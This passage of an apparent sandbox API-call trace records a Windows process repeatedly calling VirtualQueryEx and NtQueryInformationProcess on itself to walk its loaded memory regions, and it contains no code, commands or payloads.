hProcess=0xffffffffffffffff, lpAddress=0x7ff966400000, lpBuffer=0x235f530, dwLength=0x30 | out: lpBuffer=0x235f530*(BaseAddress=0x7ff966400000, AllocationBase=0x7ff966400000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0209.083] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f460, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f460, ReturnLength=0x0) returned 0x0 [0209.083] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff966360000, lpBuffer=0x235f530, dwLength=0x30 | out: lpBuffer=0x235f530*(BaseAddress=0x7ff966360000, AllocationBase=0x7ff966360000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0209.083] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f460, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f460, ReturnLength=0x0) returned 0x0 [0209.083] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff96edf0000, lpBuffer=0x235f530, dwLength=0x30 | out: lpBuffer=0x235f530*(BaseAddress=0x7ff96edf0000, AllocationBase=0x7ff96edf0000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0209.083] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f460, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f460, ReturnLength=0x0) returned 0x0 [0209.083] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff970e80000, lpBuffer=0x235f530, dwLength=0x30 | out: lpBuffer=0x235f530*(BaseAddress=0x7ff970e80000, AllocationBase=0x7ff970e80000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0209.083] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f460, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f460, ReturnLength=0x0) returned 0x0 [0209.083] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff9662f0000, lpBuffer=0x235f530, dwLength=0x30 | out: lpBuffer=0x235f530*(BaseAddress=0x7ff9662f0000, AllocationBase=0x7ff9662f0000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0209.083] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f460, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f460, ReturnLength=0x0) returned 0x0 [0209.083] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff96b950000, lpBuffer=0x235f530, dwLength=0x30 | out: lpBuffer=0x235f530*(BaseAddress=0x7ff96b950000, AllocationBase=0x7ff96b950000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0209.083] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f460, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f460, ReturnLength=0x0) returned 0x0 [0209.083] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff966140000, lpBuffer=0x235f530, dwLength=0x30 | out: lpBuffer=0x235f530*(BaseAddress=0x7ff966140000, AllocationBase=0x7ff966140000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0209.083] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f460, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f460, ReturnLength=0x0) returned 0x0 [0209.083] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x6190000, lpBuffer=0x235f530, dwLength=0x30 | out: lpBuffer=0x235f530*(BaseAddress=0x6190000, AllocationBase=0x6190000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x883000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0209.084] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f460, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f460, ReturnLength=0x0) returned 0x0 [0209.084] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff9660c0000, lpBuffer=0x235f530, dwLength=0x30 | out: lpBuffer=0x235f530*(BaseAddress=0x7ff9660c0000, AllocationBase=0x7ff9660c0000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0209.084] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f460, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f460, ReturnLength=0x0) returned 0x0 [0209.084] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff966080000, lpBuffer=0x235f530, dwLength=0x30 | out: lpBuffer=0x235f530*(BaseAddress=0x7ff966080000, AllocationBase=0x7ff966080000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0209.084] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f460, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f460, ReturnLength=0x0) returned 0x0 [0209.084] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff977030000, lpBuffer=0x235f530, dwLength=0x30 | out: lpBuffer=0x235f530*(BaseAddress=0x7ff977030000, AllocationBase=0x7ff977030000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0209.084] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f460, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f460, ReturnLength=0x0) returned 0x0 [0209.085] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff965fb0000, lpBuffer=0x235f530, dwLength=0x30 | out: lpBuffer=0x235f530*(BaseAddress=0x7ff965fb0000, AllocationBase=0x7ff965fb0000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0209.085] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f460, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f460, ReturnLength=0x0) returned 0x0 [0209.085] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff965fa0000, lpBuffer=0x235f530, dwLength=0x30 | out: lpBuffer=0x235f530*(BaseAddress=0x7ff965fa0000, AllocationBase=0x7ff965fa0000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0209.085] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f460, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f460, ReturnLength=0x0) returned 0x0 [0209.085] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff965f00000, lpBuffer=0x235f530, dwLength=0x30 | out: lpBuffer=0x235f530*(BaseAddress=0x7ff965f00000, AllocationBase=0x7ff965f00000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0209.085] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f460, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f460, ReturnLength=0x0) returned 0x0 [0209.085] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff9716a0000, lpBuffer=0x235f530, dwLength=0x30 | out: lpBuffer=0x235f530*(BaseAddress=0x7ff9716a0000, AllocationBase=0x7ff9716a0000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0209.085] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f460, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f460, ReturnLength=0x0) returned 0x0 [0209.085] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff96f7b0000, lpBuffer=0x235f530, dwLength=0x30 | out: lpBuffer=0x235f530*(BaseAddress=0x7ff96f7b0000, AllocationBase=0x7ff96f7b0000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0209.086] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f460, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f460, ReturnLength=0x0) returned 0x0 [0209.086] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff973f10000, lpBuffer=0x235f530, dwLength=0x30 | out: lpBuffer=0x235f530*(BaseAddress=0x7ff973f10000, AllocationBase=0x7ff973f10000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0209.086] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f460, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f460, ReturnLength=0x0) returned 0x0 [0209.086] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff96f600000, lpBuffer=0x235f530, dwLength=0x30 | out: lpBuffer=0x235f530*(BaseAddress=0x7ff96f600000, AllocationBase=0x7ff96f600000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0209.086] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f460, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f460, ReturnLength=0x0) returned 0x0 [0209.086] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff96def0000, lpBuffer=0x235f530, dwLength=0x30 | out: lpBuffer=0x235f530*(BaseAddress=0x7ff96def0000, AllocationBase=0x7ff96def0000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0209.086] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f460, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f460, ReturnLength=0x0) returned 0x0 [0209.086] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff965e40000, lpBuffer=0x235f530, dwLength=0x30 | out: lpBuffer=0x235f530*(BaseAddress=0x7ff965e40000, AllocationBase=0x7ff965e40000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0209.086] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f460, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f460, ReturnLength=0x0) returned 0x0 [0209.086] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff977460000, lpBuffer=0x235f530, dwLength=0x30 | out: lpBuffer=0x235f530*(BaseAddress=0x7ff977460000, AllocationBase=0x7ff977460000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0209.087] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f460, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f460, ReturnLength=0x0) returned 0x0 [0209.087] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff9710a0000, lpBuffer=0x235f530, dwLength=0x30 | out: lpBuffer=0x235f530*(BaseAddress=0x7ff9710a0000, AllocationBase=0x7ff9710a0000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0209.087] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f460, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f460, ReturnLength=0x0) returned 0x0 [0209.087] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff974410000, lpBuffer=0x235f530, dwLength=0x30 | out: lpBuffer=0x235f530*(BaseAddress=0x7ff974410000, AllocationBase=0x7ff974410000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0209.087] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f460, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f460, ReturnLength=0x0) returned 0x0 [0209.087] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff9743d0000, lpBuffer=0x235f530, dwLength=0x30 | out: lpBuffer=0x235f530*(BaseAddress=0x7ff9743d0000, AllocationBase=0x7ff9743d0000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0209.087] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f460, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f460, ReturnLength=0x0) returned 0x0 [0209.087] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff973d80000, lpBuffer=0x235f530, dwLength=0x30 | out: lpBuffer=0x235f530*(BaseAddress=0x7ff973d80000, AllocationBase=0x7ff973d80000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0209.087] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f460, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f460, ReturnLength=0x0) returned 0x0 [0209.087] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff96dd70000, lpBuffer=0x235f530, dwLength=0x30 | out: lpBuffer=0x235f530*(BaseAddress=0x7ff96dd70000, AllocationBase=0x7ff96dd70000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0209.087] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f460, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f460, ReturnLength=0x0) returned 0x0 [0209.088] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff96dec0000, lpBuffer=0x235f530, dwLength=0x30 | out: lpBuffer=0x235f530*(BaseAddress=0x7ff96dec0000, AllocationBase=0x7ff96dec0000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0209.088] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f460, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f460, ReturnLength=0x0) returned 0x0 [0209.088] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff96f770000, lpBuffer=0x235f530, dwLength=0x30 | out: lpBuffer=0x235f530*(BaseAddress=0x7ff96f770000, AllocationBase=0x7ff96f770000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0209.088] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f460, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f460, ReturnLength=0x0) returned 0x0 [0209.088] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff961e60000, lpBuffer=0x235f530, dwLength=0x30 | out: lpBuffer=0x235f530*(BaseAddress=0x7ff961e60000, AllocationBase=0x7ff961e60000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0209.088] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f460, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f460, ReturnLength=0x0) returned 0x0 [0209.088] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff961e00000, lpBuffer=0x235f530, dwLength=0x30 | out: lpBuffer=0x235f530*(BaseAddress=0x7ff961e00000, AllocationBase=0x7ff961e00000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0209.088] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f460, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f460, ReturnLength=0x0) returned 0x0 [0209.089] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff961c00000, lpBuffer=0x235f530, dwLength=0x30 | out: lpBuffer=0x235f530*(BaseAddress=0x7ff961c00000, AllocationBase=0x7ff961c00000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0209.089] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f460, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f460, ReturnLength=0x0) returned 0x0 [0209.089] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff971b50000, lpBuffer=0x235f530, dwLength=0x30 | out: lpBuffer=0x235f530*(BaseAddress=0x7ff971b50000, AllocationBase=0x7ff971b50000, AllocationProtect=0x80, __alignment1=0xffffe000, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xffffd000)) returned 0x30 [0209.089] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f460, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f460, ReturnLength=0x0) returned 0x0 [0209.089] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff974790000, lpBuffer=0x235f530, dwLength=0x30 | out: lpBuffer=0x235f530*(BaseAddress=0x7ff974790000, AllocationBase=0x7ff974790000, AllocationProtect=0x80, __alignment1=0xffffe000, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xffffd000)) returned 0x30 [0209.089] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f460, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f460, ReturnLength=0x0) returned 0x0 [0209.089] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff965aa0000, lpBuffer=0x235f530, dwLength=0x30 | out: lpBuffer=0x235f530*(BaseAddress=0x7ff965aa0000, AllocationBase=0x7ff965aa0000, AllocationProtect=0x80, __alignment1=0xffffe000, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xffffd000)) returned 0x30 [0209.089] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f460, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f460, ReturnLength=0x0) returned 0x0 [0209.089] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff965980000, lpBuffer=0x235f530, dwLength=0x30 | out: lpBuffer=0x235f530*(BaseAddress=0x7ff965980000, AllocationBase=0x7ff965980000, AllocationProtect=0x80, __alignment1=0xffffe000, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xffffd000)) returned 0x30 [0209.089] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f460, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f460, ReturnLength=0x0) returned 0x0 [0209.089] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff961960000, lpBuffer=0x235f530, dwLength=0x30 | out: lpBuffer=0x235f530*(BaseAddress=0x7ff961960000, AllocationBase=0x7ff961960000, AllocationProtect=0x80, __alignment1=0xffffe000, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xffffd000)) returned 0x30 [0209.089] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f460, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f460, ReturnLength=0x0) returned 0x0 [0209.090] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff961910000, lpBuffer=0x235f530, dwLength=0x30 | out: lpBuffer=0x235f530*(BaseAddress=0x7ff961910000, AllocationBase=0x7ff961910000, AllocationProtect=0x80, __alignment1=0xffffe000, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xffffd000)) returned 0x30 [0209.090] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f460, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f460, ReturnLength=0x0) returned 0x0 [0209.090] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff9617d0000, lpBuffer=0x235f530, dwLength=0x30 | out: lpBuffer=0x235f530*(BaseAddress=0x7ff9617d0000, AllocationBase=0x7ff9617d0000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0209.090] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f460, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f460, ReturnLength=0x0) returned 0x0 [0209.091] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff971e70000, lpBuffer=0x235f530, dwLength=0x30 | out: lpBuffer=0x235f530*(BaseAddress=0x7ff971e70000, AllocationBase=0x7ff971e70000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0209.091] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f460, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f460, ReturnLength=0x0) returned 0x0 [0209.091] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff971df0000, lpBuffer=0x235f530, dwLength=0x30 | out: lpBuffer=0x235f530*(BaseAddress=0x7ff971df0000, AllocationBase=0x7ff971df0000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0209.091] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f460, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f460, ReturnLength=0x0) returned 0x0 [0209.092] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff961750000, lpBuffer=0x235f530, dwLength=0x30 | out: lpBuffer=0x235f530*(BaseAddress=0x7ff961750000, AllocationBase=0x7ff961750000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0209.092] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f460, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f460, ReturnLength=0x0) returned 0x0 [0209.092] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff9616c0000, lpBuffer=0x235f530, dwLength=0x30 | out: lpBuffer=0x235f530*(BaseAddress=0x7ff9616c0000, AllocationBase=0x7ff9616c0000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0209.092] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f460, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f460, ReturnLength=0x0) returned 0x0 [0209.092] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff9616b0000, lpBuffer=0x235f530, dwLength=0x30 | out: lpBuffer=0x235f530*(BaseAddress=0x7ff9616b0000, AllocationBase=0x7ff9616b0000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0209.092] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f460, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f460, ReturnLength=0x0) returned 0x0 [0209.092] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff961630000, lpBuffer=0x235f530, dwLength=0x30 | out: lpBuffer=0x235f530*(BaseAddress=0x7ff961630000, AllocationBase=0x7ff961630000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0209.092] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f460, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f460, ReturnLength=0x0) returned 0x0 [0209.092] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff9615e0000, lpBuffer=0x235f530, dwLength=0x30 | out: lpBuffer=0x235f530*(BaseAddress=0x7ff9615e0000, AllocationBase=0x7ff9615e0000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0209.092] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f460, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f460, ReturnLength=0x0) returned 0x0 [0209.093] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff9615c0000, lpBuffer=0x235f530, dwLength=0x30 | out: lpBuffer=0x235f530*(BaseAddress=0x7ff9615c0000, AllocationBase=0x7ff9615c0000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0209.093] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f460, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f460, ReturnLength=0x0) returned 0x0 [0209.093] VirtualQueryEx (in: 